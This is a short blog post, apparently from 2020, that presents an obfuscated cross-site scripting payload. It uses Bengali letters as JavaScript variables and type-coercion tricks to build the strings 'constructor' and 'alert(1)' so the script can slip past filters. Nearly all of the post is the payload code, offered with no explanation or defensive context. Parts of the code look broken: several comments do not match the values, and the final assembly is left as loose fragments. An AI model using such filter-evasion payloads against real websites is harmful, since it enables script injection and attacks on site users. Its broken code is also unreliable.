#XSS Payload in #Bengali #Obfuscated

Krishnendu Paul

Jul 30, 2020 1 min read

Without any further explanation - look at the code

ক = ''              // empty string
খ = !ক + ক          // "true"
গ = !খ + ক          // "false"
ঘ = ক + {}          // "[object Object]"
ঙ = খ[ক++]          // "t" = "true"[0]
চ = খ[জ = ক]        // "r" = "true"[1]
ছ = ++জ + ক         // 2, 3
ঝ = ঘ[জ + ছ]        // "c"

  ঝ +=              // "c"
    ঘ[ক] +          // "o" = "object"[0]
    (খ.গ+ঘ)[ক] +    // "n" = "undefined"[1]
    গ[ছ] +          // "s" = "false"[3]
    ঙ +             // "t"
    চ +             // "r"
    খ[জ] +          // "u" = "true"[2]
    ঝ +            // "c" = "[object]"[5]
    ঙ +             // "t"
    ঘ[ক] +          // "o" = "[object]"[1]
    চ               // "r"
  ঝ                 // "constructor"
  গ[ক] +            //  "a"
  গ[জ] +            //  "l"
  খ[ছ] +            //  "e"
  চ +               //  "r"
  ঙ +               //  "t"
  "(ক)"             // "(1)"
Code with Comment

And minified final JS for alert(1) with obfuscation


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